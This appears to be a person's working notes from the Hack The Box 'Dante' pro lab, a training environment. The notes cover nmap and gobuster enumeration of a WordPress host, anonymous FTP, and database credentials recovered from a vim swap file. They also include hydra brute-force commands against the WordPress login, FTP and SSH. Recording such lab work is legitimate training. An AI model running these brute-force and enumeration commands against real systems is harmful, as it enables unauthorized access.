# Hack The Box - Dante Pro Lab
## Info
* https://app.hackthebox.eu/prolabs/dante
* 10.10.110.0/24
* The firewall at 10.10.110.2 is out of scope
* Themes:
    * Enumeration
    * Exploit Development
    * Lateral Movement
    * Privilege Escalation
    * Web Application Attacks

## Machines and Services
* 10.10.110.100
    * Linux 4,15-5,6 (not sure)
    * 21/tcp : vsftpd 3.0.3 Anonymous FTP allowed
    * 22/tcp : OpenSSH 8.2p1
    * 65000/tcp : Apache httpd 2.4.41
        * /wordpress
            * /wordpress/wp-admin      -> Redirectors to wp-login
            * /wordpress/wp-login.php  -> Login Form
            * /wordpress/wp-includes
            * /wordpress/wp-content
                * /wordpress/wp-content/plugins
                    * /wordpress/wp-content/plugins/akismet
                        * /wordpress/wp-content/plugins/akismet/views   -> few php files
                        * /wordpress/wp-content/plugins/akismet/_inc    -> few js and css files
                * /wordpress/wp-content/themes
                * /wordpress/wp-content/uploads
                    * /wordpress/wp-content/uploads/2020
                        * /wordpress/wp-content/uploads/2020/05     -> Pictures (jpg files)
                        * /wordpress/wp-content/uploads/2020/07     -> Pictures (jpg files)
* 10.10.110.6 : blocked by fw ?
* 10.10.110.33 : blocked by fw ?
* 10.10.110.78 : blocked by fw ?
* 10.10.110.8 : blocked by fw ?
* 10.10.110.156 : blocked by fw ?
* 10.10.110.203 : blocked by fw ?
* 10.10.110.236 : blocked by fw ?

## Credentials
* `admin:`
* `kevin:` (CEO and dev)
* `balthazar:` (CTO)
* `aj:` (dev)
* `nathan:` (devops)
* `James:`
* Database :
    * `DB_NAME : wordpress`
    * `DB_USER : shaun`
    * `DB_PASSWORD : password`
    * `DB_HOST : localhost`

## Loot
* `DANTE{Y0u_Cant_G3t_at_m3_br0!}`
* 

## 1 
* `nmap -A 10.10.110.100 -Pn`
    * found services on ports 21, 22 and 65000
    * found a flag in http robots.txt
* Browse to : `http://10.10.110.100:65000/wordpress/`
    * Found possible usernames 
* `gobuster dir -u http://10.10.110.100:65000/ -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt --timeout 30s`
    * /server-status
    * /wordpress
* `gobuster dir -u http://10.10.110.100:65000/wordpress -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt --timeout 30s`
    * /wp-content
    * /wp-includes
    * /wp-admin
* Some more gobuster on subdirectories
* FTP open 10.10.110.100 (user: anonymous, pass: anonymous)
    * Folder named Transfer
        * Contains Incoming and Outgoing folders
        * Incoming
            * todo.txt :
```
- Finalize Wordpress permission changes - PENDING
- Update links to to utilize DNS Name prior to changing to port 80 - PENDING
- Remove LFI vuln from the other site - PENDING
- Reset James' password to something more secure - PENDING
- Harden the system prior to the Junior Pen Tester assessment - IN PROGRESS
```
* Metasploit `scanner/http/wordpress_xmlrpc_login` module
    * XMLRPC is not enabled
* Metasploit `scanner/http/wordpress_ghost_scanner` module
    * XMLRPC is not enabled
* `wpscan --url http://10.10.110.100:65000/wordpress`
    * `XML-RPC seems to be enabled: http://10.10.110.100:65000/wordpress/xmlrpc.php` : doesn't work
    * `WordPress readme found: http://10.10.110.100:65000/wordpress/readme.html` : nothing there
    * `Debug Log found: http://10.10.110.100:65000/wordpress/wp-content/debug.log` : nothing there
    * `Upload directory has listing enabled: http://10.10.110.100:65000/wordpress/wp-content/uploads/`
    * `WordPress version 5.4.1 identified (Insecure, released on 2020-04-29)`
    * Config backup : `http://10.10.110.100:65000/wordpress/.wp-config.php.swp`
* More look at .wp-config.php.swp -> Vim swap file
    * Open it with : `vim -r .wp-config.php.swp`
    * It is a WP configuration file
    * `DB_NAME : wordpress`
    * `DB_USER : shaun`
    * `DB_PASSWORD : password`
    * `DB_HOST : localhost`
    * And more : 
```
define( 'AUTH_KEY', '`i4M-OPF-&:y_o`cJ.v!|=W:a_Haij>II.mI+JOJmgG,e|T:~]=#X $y53~>r=zp' );
define( 'SECURE_AUTH_KEY', 'vRZ$$_BulH8-Pp%E%r0|r8Lf|2NCj~-po#AII#^IRKy]/gzjNb8bAH;Drr|-Mt0-' );
define( 'LOGGED_IN_KEY', '*u#~mm(H.9I1%knh{`7.]OlsF3zItg$i;RVd9oG3J&i+#WrvdS<S>nSBX{S)G4y`' );
define( 'NONCE_KEY', 'v%/@I3c8yIm2q/_jtCa~if*?E&mGe?CKE1.]|TOki8=acoL5]^xq<x5AU2V*QNK&' );
define( 'AUTH_SALT', '<=y@F ]NRpB4b#aox6W<K)#W`Jv~6n<5!^@4Y[e` js<j-}$OcQl%1ynsgJCH?&Z' );
define( 'SECURE_AUTH_SALT', '{Xrv,GS#>7B({PjsgfyL} 7ct1roDs5~keDYg2ae}M6,e|+D#fVC(gA%O]{Pz[Y]' );
define( 'LOGGED_IN_SALT', 'c.T.hZjD5E9$><n?9/uav|G_9<U`^7n_cF0s1w[[|@Q:etFp}7^=Qgl~H?I{|a,A' );
define( 'NONCE_SALT', 'UAKOs%vl!RU S:reIECN^=uvXgV9PJSv(L4W+W.Q8]fR):P4Kk(@ML2}crn?W)TB' );

```
* `hydra 10.10.110.100 -L wp-users -P ../../tryhackme/rockyou.txt -s 65000 -VV http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.110.100%3A65000%2Fwordpress%2Fwp-admin%2F&testcookie=1:error" -t 64 -I`
    * wp-users containst the only usernames that exist in WP (that I found) : james and admin
    * rockyou would take too much time
    * Tried with 'probable-v2-top12000'
    * Tried with '2020-200_most_used_passwords'
    * Tried with '10k-most-common'
* `hydra -L wp-users -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ftp://10.10.110.100 -I`
    * No results
* `hydra -L wp-users -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://10.10.110.100 -I`
    * Did not finish

## 2
* Some more discovery : `fping -a -g 10.10.110.0/24 2>/dev/null`
    * Only gives us `10.10.110.100` and the out-of-scope FW










